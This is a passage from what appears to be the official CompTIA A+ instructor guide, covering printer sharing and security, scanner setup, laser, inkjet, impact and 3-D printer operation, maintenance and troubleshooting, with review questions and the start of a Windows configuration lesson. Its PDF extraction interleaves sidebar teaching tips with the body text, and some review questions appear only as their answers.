Tip
Note that printing
preferences are set
as defaults but can
also be set for each
job via the software
application’s Print
dialog.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
302 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Printing Preferences dialog box—this shortcuts tab lets you select from preset
option templates. (Screenshot courtesy of Microsoft.)
Paper/Quality
The Paper/Quality tab allows you to choose the type of paper stock (size and type)
to use and whether to use an economy or draft mode to preserve ink/toner. You
can also use the Color tab to select between color and grayscale printing.
Use the Paper/Quality tab to configure the paper type and whether to use a reduced
ink/toner economy mode. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 303
Finishing
The Finishing tab lets you select output options such as whether to print on both
sides of the paper (duplex), print multiple images per sheet, and/or print in portrait
or landscape orientation.
Printer Sharing
The interfaces on a print device determine how it is connected to the network. The Show
printer sharing model describes how multiple client devices access the printer. Slide(s)
Some printers come with integrated or embedded print server hardware and Printer Sharing
firmware, allowing client computers to connect to them directly over the network
without having to go via a server computer. Teaching
Tip
This is an important
section. Make
sure students can
distinguish between
connecting to a
printer directly over
the network and
connecting to a printer
object shared via a PC
configured as a print
server.
Note that the
differences between
Sharing and Security
permissions in
Windows, plus the use
of accounts generally,
are covered in more
detail in the Core 2
course.
Installing a network printer using a vendor tool. The printer has been connected to the network
via an Ethernet cable and been assigned an Internet Protocol (IP) address by a Dynamic Host
Configuration Protocol (DHCP) server.
A public printer is configured with no access controls so any guest client may use it.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
304 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Sharing a printer via the Printer Properties dialog box. Use the Additional Drivers button
from the Sharing page to install drivers for operating systems other than the host print server.
(Screenshot courtesy of Microsoft.)
If the network has clients running a mix of different operating systems, you need
to consider how to make a printer driver available for each supported client. If the
printer supports a “Type 3” driver, you need only add x86 (32-bit Windows) and/or
x64 (64-bit Windows) support. For earlier “Type 2” drivers, each specific Windows
version requires its own driver.
Windows 10 adds support for Type 4 drivers. These are designed to move toward a print
class driver framework, where a single driver will work with multiple devices. Where a
specific print device driver is required, the client obtains it from Windows Update rather
than the print server.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 305
Printer Security
Use of printers raises several security issues, including access to print services and Show
risks to the confidentiality of printed output. Slide(s)
Printer Security
User Authentication
Teaching
It may be necessary to prevent unauthorized use of a network printer. User
Tip
authentication means that the printer sharing server or print device will only accept
Explain that user
print jobs from authorized user accounts.
authentication
User authentication can be configured on a print share. For example, in Windows, determines whether
the Sharing and Security tabs can be configured with a list of users or groups a user can submit a
print job to the printer
permitted to submit print jobs. in the first place.
Secured print holds
Windows shares, permissions, and authentication are covered in more detail in the Core the print job until the
2 course. user confirms that he
or she is physically
present at the print
device by inputting
a PIN or presenting
The print device might support user authentication options for clients who connect a badge. This is
directly. A local authentication option means that a list of valid usernames and designed to prevent
passwords is stored on the print device itself. A network option means that the confidential or privacy-
sensitive documents
print device can communicate with a directory server to authenticate and authorize from being lost or
users. stolen.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
306 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Badging means the print device is fitted with a smart card reader. The employee
must present his or her ID badge to the reader to start the print job.
The secured print option may be selected as a default option or configured for
a particular print job. Secured prints may only be cached for a limited time and
deleted if not printed in time. The print device might require a memory card or
other storage to cache encrypted print jobs.
Audit Logs
A printer share server or print device can be configured to log each job. This
provides an audit record of documents that were sent to the printer by given user
accounts and client devices. An audit log could be used to identify documents
that were printed and have gone missing or to identify unauthorized release of
information. If the log is generated on the print device, a log collector such as syslog
can be configured to transmit the logs to a centralized log server.
Scanner Configuration
Show Many office printers are implemented as multi-function devices (MFDs). An MFD
Slide(s) typically performs the functions of a printer, scanner/copier, and fax machine.
Scanner Configuration A scanner is a digital imaging device, designed to create computer file data from
a real-life object. Typically, scanners handle flat objects, like documents, receipts,
Teaching
or photographs. Optical Character Recognition (OCR) software can be used to
Tip
convert scanned text into digital documents, ready for editing.
Make sure students
understand the
options that must be
configured to support
the different network
scan service types.
An MFD that can scan, print, and fax documents. (Image © 123RF.com)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 307
Scanner Types
Scanners are available in two basic formats: A flatbed scanner works by shining a
bright light at the object, which is placed on a protective glass surface. A system of
mirrors reflects the illuminated image of the object onto a lens. The lens either uses
a prism to split the image into its component RGB colors or focuses it onto imaging
sensors coated with different color filters. This information is used to create a
bitmap file of the object. An automatic document feeder (ADF) passes paper over
a fixed scan head. This is a more efficient means of scanning multi-page documents.
• Server Message Block (SMB) or scan to folder means that the scan is created
as a file on a shared network folder. The MFD must be configured with the path
to a suitably configured file server and shared folder. Each user must have
permission to write to the share.
• Scan to cloud services mean that the scan is uploaded as a file to a document
storage and sharing account in the cloud. Cloud services such as OneDrive or
Dropbox will generally be available as options on the MFD, or there may be the
ability to configure a custom service via a template. The scan dialogs will allow
the user to authenticate to a given cloud account.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
308 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Printer and Multifunction Devices
3
Teaching 1. Following some past issues with faults arising in print devices because
Tip of improper setup procedures, you are updating the company’s work
Take some time at instructions for printer installation. You have noted that technicians
the end of each topic must refer to the product instructions, use safe lifting techniques, and
to answer questions.
You can use the
ensure removal of packing strips. What additional guidance should you
review questions include?
for discussion in
class or set them for Allow the print device to acclimate for a few hours after unboxing to avoid risks
students to complete from condensation.
individually during or
after class. 2. You use three Windows 10 applications that need to print to a Canon
inkjet printer. How many printer drivers must you install?
One. Applications rely on the operating system to mediate access to devices. They
do not need their own drivers.
Switch to a PostScript (PS) driver. This is likely to have better support for accurate
color models. You might also suggest running a calibration utility.
4. True or false? To enable printer sharing via Windows, the print device
must be connected to the Windows PC via an Ethernet or Wi-Fi link.
False—any print device can be shared via printer properties. The print device can
be connected to the Windows print server over USB, Bluetooth, Ethernet, or Wi-
Fi. Other clients connect to the printer via the share, however, so the Windows PC
must be kept on to facilitate printing.
The print device’s IP address or host name. You might note that vendor utilities
can search for a connected device on the local network, so “None” could also be a
correct answer.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 309
Topic 9B
Replace Print Device Consumables
7
Processing Stage
Laser printers produce output as a series of dots. The OS driver encodes the page
in a page description language and sends it to the print device. In the processing
stage, the printer’s formatter board processes the data to create a bitmap (or
raster) of the page and stores it in the printer’s RAM.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
310 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Charging Stage
In the charging stage, the imaging drum is conditioned by the primary charge
roller (PCR). The PCR is a metal roller with a rubber coating powered by a high
voltage power supply assembly. The PCR applies a uniform -600 V electrical charge
across the drum’s surface.
Exposing Stage
The surface coating of the photosensitive imaging drum loses its charge when
exposed to light. In the exposing stage, as the laser receives the image information,
it fires a short pulse of light for each dot in the raster to neutralize the charge that
was applied by the PCR. The pulsing light beam is reflected by a polygonal mirror
through a system of lenses onto the rotating photosensitive drum. The drum
ends up with a series of raster lines with charge/no-charge dots that represent an
electrostatic latent image of the image to be printed.
Developing Stage
Laser toner is composed of a fine compound of dyestuff and either wax or plastic
particles. The toner is fed evenly onto a magnetized developer roller from a
hopper.
The developer roller is located very close to the photosensitive drum. The
toner carries the same negative charge polarity as the drum, which means that,
under normal circumstances, there would be no interaction between the two
parts. However, once areas of charge have been selectively removed from the
photosensitive drum by the laser, the toner is attracted to them and sticks to those
parts of its surface. The drum, now coated with toner in the image of the document,
rotates until it reaches the paper.
The imaging drum, PCR, developer roller, and toner hopper are provided as components
within a toner cartridge.
Transferring Stage
The transferring stage moves the toner from the drum onto the print media. The
paper transport mechanism includes components such as gears, pads, and rollers
that move the paper through the printer. Pickup components lift a single sheet of
paper from the selected input tray and feed it into the printer. To do this, a pickup
roller turns once against the paper stack, pushing the paper into a feed and
separation roller assembly. This assembly is designed to allow only one sheet to
pass through.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 311
Pickup, feed, and separation rollers on an HP 5Si laser printer. (Image courtesy of CompTIA.)
A printer will have a number of automatic trays and a manual tray. The manual feed
tray uses a separation pad rather than rollers.
When the paper reaches the registration roller, a signal tells the printer to start the
image development process. When the drum is ready, the paper is fed between
the imaging drum and the high voltage transfer roller. The transfer roller applies
a positive charge to the underside of the paper. This causes the toner on the drum
to be attracted to the paper. As the paper leaves the transfer assembly, a static
eliminator strip (or detac corona) removes any remaining charge from the paper.
This is done to avoid the paper sticking to the drum or curling as it enters the fuser
unit.
Fusing Stage
From the transfer assembly, the paper passes into the fuser assembly. The fuser
unit squeezes the paper between a hot roller and a pressure roller so that the toner
is melted onto the surface of the paper. The hot roller is a metal tube containing a
heat lamp; the pressure roller is typically silicon rubber. The heat roller has a Teflon
coating to prevent toner from sticking to it.
Cleaning Stage
To complete the printing cycle, the photosensitive drum is cleaned to remove
any remaining toner particles using a cleaning blade, roller, or brush resting on
the surface of the drum. Any residual electrical charge is removed, using either a
discharge (or erase lamp) or the PCR.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
312 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The entire laser printer cycle takes place in one smooth sequence, but since the
circumference of the drum that processes the image is smaller than a sheet of paper,
the early stages must be repeated 2–4 times (according to size) to process a single page.
• Position the media guides at the edges of the loaded stack. The printer uses
sensors from the guides to detect the paper size. Different trays may support
different types, sizes, and thicknesses of media. Do not add unsupported media
to a tray or overload it.
• Do not use creased, dirty, or damp paper. Ensure that paper is stored in a
climate-controlled location with no excessive humidity, temperature, or dust.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 313
Take the new cartridge and remove the packing strips as indicated by the
instructions. Rock the cartridge gently from front to back to distribute the toner
evenly. Insert the cartridge, close the service panel, turn on, and print a test page.
The drum in the toner cartridge is light-sensitive. Fit the cartridge in the print device
immediately.
Toner cartridges are Waste from Electrical and Electronic Equipment (WEEE) and
must be disposed of according to local regulations, such as by recycling them at an
approved facility. Do not dispose of cartridges as general waste.
• Wipe dust and toner away from the printer interior or exterior with a soft cloth,
or use a toner-safe vacuum.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
314 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Do not use a compressed air blaster to clean a laser printer! You risk blowing toner
dust into the room, creating a health hazard. Do not use an ordinary domestic vacuum
cleaner. Toner is conductive and can damage the motor. Toner is also so fine that it will
pass straight through the dust collection bag and back into the room.
• If toner is spilled on skin or clothes, wash it off with cold water. Using hot water
is not recommended because heat can open the pores of your skin and allow
toner particles to penetrate more easily.
• Use IPA (99% Isopropyl Alcohol solution) and non-scratch, lint-free swabs to
clean rollers and electronic contacts. Take care not to scratch a roller.
• Follow the manufacturer’s recommendations for replacing the printer’s dust and
ozone filters regularly.
Calibrating a Printer
Calibration is the process by which the printer determines the appropriate print
density or color balance (basically, how much toner to use). Most printers calibrate
themselves automatically. If print output is not as expected, you can often invoke
the calibration routine from the printer’s control panel or its software driver.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 315
• With the thermal method, the ink at each nozzle in the print head is heated,
creating a bubble. When the bubble bursts, it sprays ink through the nozzle and
draws more ink from the reservoir. In general, thermal inkjet print heads are
cheaper and simpler to produce, but the heating elements have a relatively short
life. Most thermal printers use a combined print head and ink reservoir. When
the ink runs out, the print head is also replaced.
• In the Epson design, the nozzle contains a piezoelectric element, which changes
shape when a voltage is applied. This acts like a small pump, pushing ink through
the nozzle and drawing ink from the reservoir.
Carriage System
Inkjet printers build up the image line by line. The print head is moved back and
forth over the paper by a carriage system. On some types of printers, ink is applied
when the print head moves in one direction only; bidirectional models apply ink
on both the outward and return passes over the page. The carriage system uses a
stepper motor, pulley, and belt to move the print head, a guide shaft to keep the
print head stable, and sensors to detect the position of the print head. A flat ribbon
data cable connects the print head to the printer’s circuit board.
When a line has been completed, another stepper motor advances the page a little
bit, and the next line or row is printed.
There may also be a lever used to set the platen gap or the printer may adjust this
automatically depending on driver settings. The platen gap is the distance between
the print head and the paper. Having an adjustable platen gap allows the printer to
use thicker media.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
316 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
3. The eject rollers then deliver the paper to the duplexing assembly (if installed
and duplex printing has been selected) or the output bin. Some inkjets with a
curved paper path may have a “straight-through” rear panel for bulkier media.
Inkjets tend to have smaller paper trays than laser printers and therefore can
need restocking with paper more often. Most inkjets can use “regular” copier/laser
printer paper, but better results can be obtained by using less absorbent, premium
grades of paper stock, specifically designed for inkjet use. Often this type of paper is
designed to be printed on one side only—make sure the paper is correctly oriented
when loading the printer.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 317
When the inkjet’s driver software determines that a cartridge is empty, it will
prompt you to replace it. Check the printer’s instruction manual for the correct
procedure.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
318 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Use the Maintenance or Tools tab on an inkjet printer's property sheet to access cleaning
routines and calibration utilities. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 319
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
320 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Carbon paper (or impact paper) is used to make multiple copies of a document
in the same pass (hence carbon copy, or “cc”). A sheet of carbon paper is
inserted between each sheet of plain paper, and when the print head strikes, the
same mark is made on each sheet.
• Tractor-fed paper is fitted with removable, perforated side strips. The holes
in these strips are secured over studded rollers at each end of the platen. This
type of paper is more suitable for multi-part stationery as there is less chance of
skewing or slippage since the end rollers fix the movement of the paper.
When you are loading a tractor-fed impact printer with paper, ensure that the
holes in the paper are engaged in the sprockets and that the paper can enter the
printer cleanly. Ensure that the lever is in the correct position for friction feed or
tractor feed as appropriate for the media being used.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 321
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
322 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Bed/build surface—a sheet placed onto the base plate to hold the object in
position while printing but also allow its removal on completion. The bed surface
material may need to be matched to the filament material for best results.
• Fan—cools the melted plastic where necessary to shape the object correctly.
3-D printing involves several possible safety risks. Components work at high
temperatures, and use of sharp tools such as scrapers and finishing knives is required.
Ideally, the 3-D print facility should be accessible only to trained users.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 323
Filament
The “ink” for a 3-D printer is supplied as a spool of filament. Filament is provided
in a diameter of either 1.75 mm or 3 mm. There are various filament materials.
The two most popular plastics are polylactic acid (PLA) and acrylonitrile butadiene
styrene (ABS). Most printers can use a range of filament types, but it is best to check
compatibility if a specific “exotic” is required for a project. Each material operates at
different extruder and print-bed temperatures.
To change a filament, the extruder must be heated to the appropriate temperature.
Pull as much of the old filament out as possible—taking care not to burn yourself—
then push the new filament through. Do not start printing until all the old filament
has been pushed out.
Filament spools require careful storage once opened. They should be kept free Teaching
from heat and humidity. Tip
Explain that the
Resin and Other 3-D Printer Types media types are not
interchangeable. A
There are two other common types of 3-D printer. These use different materials 3-D printer designed
than filament: for use with filament
cannot be used for
• Stereolithography (SLA) uses liquid plastic resin or photopolymer to create SLA or SLS.
objects which are cured using an ultraviolet laser. Excess photopolymer is stored
in a tank under the print bed. The print bed lowers into the tank as the object is
created. A liquid solvent removes uncured polymer after the model is finished.
• Selective laser sintering (SLS) fuses layers together using a pulse laser. The object
is created from a powder and lowered into a tank as each layer is added. The
powder can be plastic or metal.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
324 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Print Device Consumables
8
Teaching 1. What must you do before installing a new toner cartridge into a printer?
Tip
Take some time at Remove the packing strips. The printer should also be turned off, and the old
the end of each topic cartridge should be removed and placed into a sealed bag for recycling.
to answer questions.
You can use the 2. Which components are provided as part of a laser printer maintenance
review questions kit?
for discussion in
class or set them for The main component is a new fuser assembly. The kit will also usually contain a
students to complete transfer/secondary charge roller plus paper transport rollers for each tray (pickup
individually during or
after class.
rollers and a new separation pad).
3. What types of paper/stationery can dot matrix printers use that laser
and inkjet printers cannot?
Using the steps in the printer documentation, replace the ribbon in the printer and
clean the print head. If this does not fix the problem, replace the print head.
5. A thermal printer used to create labels for parts bins, kits, and boxes
is jammed due to a label coming loose during printing. How should you
resolve this problem?
Open the printer and locate the label that came off the backing. Remove the label,
and if there is any sticky residue, clean it with isopropyl alcohol (IPA) applied to a
swab. Ensure the roll of labels is properly loaded and that there are no loose labels
that might come loose again.
The 3-D print process is sensitive to movement and vibration, so the printer must
be located on a firm and stable surface. The process can also be affected by dust
and the ambient temperature and humidity (especially variations and drafts).
Finally, some printer types are fully exposed, so there is some risk of burns from the
high-heat elements. Ideally, the printer should not be accessible to untrained staff.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 325
Topic 9C
Troubleshoot Print Device Issues
7
A printer connectivity issue might arise either because the device cannot be located Show
when trying to install it or because the OS reports an installed device as offline or Slide(s)
unavailable. Printer Connectivity
In many cases there will be an error message or code displayed on the print device’s Issues
control panel. You may need to look the error code up in the printer documentation
Teaching
to confirm what it means. In the absence of any error code or descriptive error log,
Tip
remember to test obvious things first:
Connectivity isn’t
• Verify that the printer is switched on and online. A printer can be taken offline actually a content
quite easily by pressing the button on the control panel. Often this happens by example, but it is
accident. A printer may also go offline because it is waiting for user intervention, worth discussing
it has detected a network error, or because it has received corrupt print job data. as a general
introduction to printer
troubleshooting.
• Check that all components and cartridges are correctly installed, that all service
Encourage students
panels are closed, and that at least one tray is loaded with paper. to refer back to the
troubleshooting
• Print a test page using the printer’s control panel. If this works, the issue lies with model and apply a
the connection to the computer/network. methodical approach
to identifying the
• Cycle the power on the print device. If this does not solve the issue, consider problem: distinguish
performing a factory reset. between OS/printer
connectivity issues
• Inspect the USB/Ethernet cable and connectors. Consider replacing with a and print device/
known good cable to test for a cable or connector problem. If possible, attempt media issues.
a different connection type. For example, if a wireless printer is not detected, try
connecting to a computer via USB or using an Ethernet cable.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
326 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The printer control panel should identify the location of the paper jam. (Image courtesy of CompTIA.)
If paper jams are frequent, you need to diagnose the problem rather than simply fix
the symptom each time. Most paper jams arise because the media (paper or labels)
are not suitable for the printer or because a sheet is creased, folded, or not loaded
properly in the tray. There could be a problem with a roller too. Identify whether or
not the jam occurs in the same place each time, and take appropriate preventive
maintenance (clean or replace the part).
If the media and pickup rollers are good and if the jam occurs within the drum
assembly but before the image is fused, the cause could be a faulty static eliminator.
Normally, this part removes the high static charge from the paper as it leaves the
transfer unit. If the strip fails, the paper may stick to the drum or curl as it enters the
fuser unit.
With an inkjet, it is usually easy to see exactly where the paper has jammed. If the
sheet will not come out easily, do not just try to pull it harder—check the instruction
manual to find out how to release any components that might prevent you from
removing the paper.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 327
Fan the edge of a paper stack with your thumb to separate the sheets before loading the
tray. Do not overdo this, however—you can generate a static charge that will hold the
sheets together.
• If you can discount a media problem, try changing the pickup rollers. In a laser
printer, these are part of the maintenance kit.
• White stripes—This indicates either that the toner is poorly distributed (give the
cartridge a gentle shake) or that the transfer roller is dirty or damaged.
• Black stripes or whole page black—This indicates that the primary charge
roller is dirty or damaged or that the high voltage power supply to the developer
unit is malfunctioning. Try printing with a known good toner cartridge.
• Speckling on output—Loose toner may be getting onto the paper. Clean the
inside of the printer using an approved toner vacuum.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
328 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Toner not fused to paper—Output that smudges easily indicates that the fuser
needs replacing.
• Double/echo images—This is a sign that the photosensitive drum has not been
cleaned properly. The drum is smaller than the size of a sheet of paper, so if the
latent image is not completely cleared, it will repeat as a light “ghost” or dark
“shadow” image farther down the page. Images may also appear from previous
prints. Try printing a series of different images, and see if the problem resolves
itself. If not, replace the drum/toner cartridge.
• Incorrect chroma display—If prints come out in the wrong color (for example,
if the whole print has a magenta tint), ensure that the toner cartridges have been
installed in the correct location (for instance, that a magenta cartridge hasn’t
been installed in the cyan slot). Also ensure that there is sufficient toner in each
cartridge. If there is a cast or shadow-like effect, the transfer belt or one or all of
the cartridges or rollers are probably misaligned. Try reseating them, and then
run the printer calibration utility and print a test page to verify the problem is
solved.
• Color missing—If a color is completely missing, try replacing the cartridge. If this
does not solve the issue, clean the contacts between the printer and cartridge.
Finishing Issues
Show A finisher unit can be installed on laser printers and MFDs to perform various
Slide(s) functions, including stapling the pages of a print job or punching holes in the sheets
Finishing Issues so that they can be placed in a binder. The printer settings must be configured to
select the finisher as an installed output option.
• Incorrect page orientation—The paper size and orientation must be set correctly
for the print job or the finishing/binding will be aligned to the wrong edge. It can
be tricky for users to paginate the source document and select the correct output
options, especially when using a booklet print option to apply staples to the middle
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 329
of the sheet. The icon in the printing preferences dialog will show which edge is
selected for binding. Test settings on a short document first.
The Finishing tab in Printing Preferences allows you to select orientation and duplex output (this
printer allows only manual duplex, where the stack must be flipped by the user and reinserted into
the paper tray manually). You can also configure booklet layout. Note the icon showing which edge
is used for binding. (Screenshot courtesy of Microsoft.)
• Hole punch—The main issue with hole punching is exceeding the maximum
number of sheets. This can cause the finishing unit to jam. Make sure print jobs
are sent in batches of less than the maximum permissible sheet count for the
finisher unit. Be aware that the maximum number of sheets may depend on the
paper weight (sheet thickness).
• Staple jam—An excessive number of sheets is also the primary cause of staple
jams. One staple will become bent and stuck within the punch mechanism.
Remove the staple cartridge, and release the catch at the end to allow removal
of stuck staples.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
330 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
If the print device is accessed over the network, a redirector service on the local
computer passes the print job from the locally spooled file to the spooler on the
print server. The print server then transmits it to the print device.
Use the print queue to manage jobs—in this instance, you should be loading the printer with some
paper rather than trying to restart the print job. (Screenshot courtesy of Microsoft.)
If you cannot delete a job (if the print queue is backed up or stalled), you will need
to stop and restart the Print Spooler service.
The same steps apply to a shared printer. The server’s print queue will hold jobs from
multiple users.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 331
Review Activity:
Print Device Issues
8
1. A user reports that the printed output is not up to the usual standards Show
for her printer. You will need to resolve this issue so she can print her Slide(s)
report. What is the overall process for troubleshooting this issue? Review
Print out a test page to see if you can reproduce the problem the user reported. If Teaching
you see the same problem as reported by the user, identify the print defect, based Tip
on the type of printer, to resolve the problem. Document the steps you took to
Take some time at
resolve the problem. the end of each topic
to answer questions.
2. How would you track down the source of a paper jam? You can use the
review questions
Check the error message reported by the printer (this may be shown on the for discussion in
printer’s console). It may indicate the location of the stuck pages. Otherwise, visually class or set them for
inspect the various feed and output mechanisms. students to complete
individually during or
3. Paper is repeatedly jamming in an inkjet printer. What could be causing after class.
this?
The paper might not be loaded squarely, there might be too much paper loaded
into the tray, or the paper is creased or dirty.
5. What effect does a dirty primary charge roller have on laser printing?
It leaves black stripes on the paper. If the roller does not apply the correct charge
evenly to the drum, toner is attracted to the place where the charging failed,
creating a black stripe all the way down the page.
Try using the printer’s built-in cleaning cycle and then replacing the ink cartridge. If
these do not work, try using an aftermarket cleaning product. Try using the printer
properties sheet to check for print head alignment, color settings, and other settings.
7. If print jobs do not appear at the printer and the queue is clear, what
could you try first to solve the problem?
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
332 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 9
Summary
8
Show You should be able to deploy, maintain, and troubleshoot printers and
Slide(s) multifunction devices.
Summary
Guidelines for Supporting Print Devices
Teaching
Follow these guidelines to support the use of print and scan services in your
Tip
organization:
Try to include some
time at the end • Ensure that operational procedures account for selection of an appropriate
of each lesson to printer type, setup location, and unboxing to meet end-user and print
check students' application requirements.
understanding and
answer questions. • Identify an appropriate printer networking model (direct to print device versus
Interaction sharing via print server), make drivers available to the range of clients, configure
Opportunity appropriate defaults for printer properties and printing preferences, and ensure
that appropriate options are applied to protect the security and privacy of output
If you don’t have the
option of running any
(such as authentication to use the printer and use of secured print options).
workbench labs for
printer installation
• Create work instructions and prepare inventory for tasks relating to supported
and troubleshooting, printer types:
get students to
review the support • Laser imaging drum, pickup rollers, separation pads, transfer roller/belt,
documentation for fuser assembly, duplexing assembly, toner and maintenance kit replacement,
different printer calibration, and cleaning.
models. The following
represent some • Inkjet cartridge, print head, roller, feeder, duplexing assembly, carriage belt,
common printer types: cleaning, cartridge replacement, and calibration.
• HP LaserJet
Enterprise MFP • Direct thermal feed assembly, heating element, special thermal paper, and
M830 (office laser cleaning.
printer)
• HP LaserJet • Impact printer print head, ribbon, tractor feed and impact paper, and ribbon
Enterprise and print head replacement.
Finishing
Accessories • 3-D printer print bed and filament versus resin types.
• Canon PIXMA
TS8350 (SOHO
• Establish a knowledge base to document common issues, such as lines down
inkjet) the printed pages, garbled print, toner not fusing to paper, paper jams, faded
• Espon SureColor
print, incorrect paper size, paper not feeding, multipage misfeed, multiple prints
SC-T3405 large pending in queue, speckling on printed pages, double/echo images on the print,
format inkjet incorrect chroma display, grinding noise, finishing issues, and incorrect page
• Epson PLQ-50M orientation.
dot matrix printer
• Brother TD- Additional practice questions for the topics covered in this lesson are available on the
4420TN direct CompTIA Learning Center.
thermal label
printer
• Dremel DigiLab
3D45 3D filament
printer
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 10
Configuring Windows
1
LESSON INTRODUCTION
The operating system (OS) is the software that provides a user interface to the Show
computer hardware and provides an environment in which to run software Slide(s)
applications and create computer networks. As a professional IT support Objectives
representative or PC service technician, your job will include installing, configuring,
maintaining, and troubleshooting personal computer (PC) operating systems. Teaching
Tip
Before you can perform any of these tasks, you need to understand the basics of
what an operating system is, including the various versions, features, components, The first part of
the Core 2 course
and technical capabilities. With this knowledge, you can provide effective support
covers Windows
for all types of system environments. configuration settings
In this lesson, you will learn how the basic administrative interfaces for Microsoft® and management
tools. While the focus
Windows 10® and Microsoft® Windows 11® can be used to configure user and is on Windows 10,
system settings. make students aware
of Windows 11. Many
of the basic user
Lesson Objectives and administration
interfaces are the
In this lesson, you will: same in both versions.
• Configure Windows user settings.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
334 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 10A
Configure Windows User Settings
2
Windows Interfaces
Show An OS is made up of kernel files and device drivers to interface with the hardware
Slide(s) plus programs to provide a user interface and configuration tools. The earliest
Windows Interfaces operating systems for PCs, such as Microsoft’s Disk Operating System (DOS), used
a command-line user interface or simple menu systems. Windows and software
Teaching applications for Windows were marked by the use of a graphical user interface
Tip (GUI). This helped to make computers easier to use by non-technical staff and
If necessary, recap home users.
the main elements
of the Windows
The GUI desktop style favored by a particular OS or OS version is a powerful factor
